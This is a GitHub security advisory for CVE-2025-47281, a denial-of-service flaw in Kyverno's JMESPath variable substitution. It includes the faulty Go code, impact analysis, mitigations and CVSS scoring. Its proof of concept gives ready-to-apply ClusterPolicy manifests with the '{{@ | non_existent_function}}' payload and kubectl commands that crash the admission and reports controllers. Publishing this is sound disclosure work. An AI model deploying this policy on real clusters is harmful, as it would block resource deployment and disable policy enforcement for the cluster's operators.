Skip to content

Kyverno's Improper JMESPath Variable Evaluation Lead to Denial of Service

High severity GitHub Reviewed Published Jul 22, 2025 in kyverno/kyverno

Package

gomod github.com/kyverno/kyverno (Go)

Affected versions

<= 1.14.1

Patched versions

1.14.2

Description

Summary

A Denial of Service (DoS) vulnerability exists in Kyverno due to improper handling of JMESPath variable substitutions. Attackers with permissions to create or update Kyverno policies can craft expressions using the {{@}} variable combined with a pipe and an invalid JMESPath function (e.g., {{@ | non_existent_function }}).

This leads to a nil value being substituted into the policy structure. Subsequent processing by internal functions, specifically getValueAsStringMap, which expect string values, results in a panic due to a type assertion failure (interface {} is nil, not string). This crashes Kyverno worker threads in the admission controller (and can lead to full admission controller unavailability in Enforce mode) and causes continuous crashes of the reports controller pod, leading to service degradation or unavailability."

Details

The vulnerability lies in the getValueAsStringMap function within pkg/engine/wildcards/wildcards.go (specifically around line 138):

func getValueAsStringMap(key string, data interface{}) (string, map[string]string) {
    // ...
    valMap, ok := val.(map[string]interface{}) // val can be the map containing the nil value
    // ...
    for k, v := range valMap { // If valMap contains a key whose value is nil...
        result[k] = v.(string) // PANIC: v.(string) on a nil interface{}
    }
    return patternKey, result
}

When a policy contains a variable like {{@ | foo}} (where foo is not a defined JMESPath function), the JMESPath evaluation within Kyverno's variable substitution logic results in a nil value. This nil is then assigned to the corresponding field in the policy pattern (e.g., a label value).

During policy processing, ExpandInMetadata calls expandWildcardsInTag, which in turn calls getValueAsStringMap. If the data argument to getValueAsStringMap (derived from the policy pattern) contains this nil value where a string is expected, the type assertion v.(string) panics when v is nil.

Proof of Concept (PoC)

This proof of concept consists of two phases. First a malicious policy is inserted with the default validation failure action, which is Audit. In this phase the reports controller will end up in a crash loop. The admission controller will print out a similar stack trace, but only a worker crashes. The admission controller process does not crash.

In the second phase the same policy is inserted with the Enforce validation failure action. In this scenario both admission controller and the reports controller end up in a crash loop. As the admission controller crashes on incoming admission requests, it effectively makes it impossible to deploy new resources.

Tested on Kyverno v1.14.1.

  1. Prerequisites:
    Kubernetes cluster with Kyverno installed. Attacker has permissions to create/update ClusterPolicy or Policy resources.

  2. Create a Malicious Policy:
    Apply the following ClusterPolicy:

    apiVersion: kyverno.io/v1
    kind: ClusterPolicy
    metadata:
        name: dos-via-jmespath-nil
    spec:
        rules:
        - name: trigger-nil-panic
          match:
            any:
            - resources:
                kinds:
                - Pod
          validate:
              message: "DoS attempt via JMESPath nil substitution"
              pattern:
                metadata:
                  labels:
                    # '{{@ | non_existent_function}}' will result in a nil value for this label.
                    # This nil value causes a panic in getValueAsStringMap.
                    trigger_panic: "{{@ | non_existent_function}}"
  3. Verify the policy status:
    Make sure the policy is ready.

    k get clusterpolicy dos-via-jmespath-nil
    NAME                   ADMISSION   BACKGROUND   READY   AGE   MESSAGE
    dos-via-jmespath-nil   true        true         True    24m   Ready
  4. Trigger the Policy:
    Create any Pod in any namespace (if not further restricted by match or exclude):

    kubectl run test-pod-dos --image=nginx
  5. Observe Crashes:

  6. Reset:
    Delete the existing policy with kubectl delete clusterpolicy dos-via-jmespath-nil and delete
    the test pod with kubectl delete pod test-pod-dos. Then apply the following:

     apiVersion: kyverno.io/v1
     kind: ClusterPolicy
     metadata:
         name: dos-via-jmespath-nil-enforce
     spec:
         validationFailureAction: Enforce # This has changed
         rules:
         - name: trigger-nil-panic
           match:
             any:
             - resources:
                 kinds:
                 - Pod
           validate:
               message: "DoS attempt via JMESPath nil substitution"
               pattern:
                 metadata:
                   labels:
                     # '{{@ | non_existent_function}}' will result in a nil value for this label.
                     # This nil value causes a panic in getValueAsStringMap.
                     trigger_panic: "{{@ | non_existent_function}}"
  7. Trigger the Policy (again):
    Create any Pod in any namespace (if not further restricted by match or exclude):

    kubectl run test-pod-dos --image=nginx

    The command returns the following error:

    Error from server (InternalError): Internal error occurred: failed calling webhook "validate.kyverno.svc-fail": failed to call webhook: Post "https://kyverno-svc.kyverno.svc:443/validate/fail?timeout=10s": EOF
  8. Observe Crashes:

    • Check Kyverno admission controller logs for container panic. Notice that the whole controller has crashed, not just a worker.
    • Check Kyverno reports controller logs; the pod crashes and restarts.

Impact

This is a Denial of Service (DoS) vulnerability.

  • Affected Components:

    • Kyverno Admission Controller: In Audit mode, individual worker threads handling admission requests will panic and terminate. While the main pod uses a worker pool and can recover by spawning new workers, repeated exploitation can degrade performance or lead to worker pool exhaustion. In Enforce mode, the whole controller panics. This makes all related admission requests fail.
    • Kyverno Reports Controller: The entire controller pod will panic and crash, requiring a restart by Kubernetes. This halts background policy scanning and report generation.
  • Conditions: An attacker needs permissions to create or update Kyverno Policy or ClusterPolicy resources. This is often a privileged operation but may be delegated in some environments.

  • Consequences: Degraded policy enforcement, inability to create/update resources, and loss of policy reporting visibility.

Mitigation

  • Add robust nil handling in getValueAsStringMap.
  • Look into adding graceful error handling in JMESPath substitution. Prevent evaluation errors (like undefined functions) from resulting in nil values.

References

@realshuting realshuting published to kyverno/kyverno Jul 22, 2025
Published to the GitHub Advisory Database Jul 22, 2025
Reviewed Jul 22, 2025

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
None
Integrity
None
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

EPSS score

Weaknesses

Improper Input Validation

The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. Learn more on MITRE.

Uncaught Exception

An exception is thrown from a function, but it is not caught. Learn more on MITRE.

CVE ID

CVE-2025-47281

GHSA ID

GHSA-r5p3-955p-5ggq

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.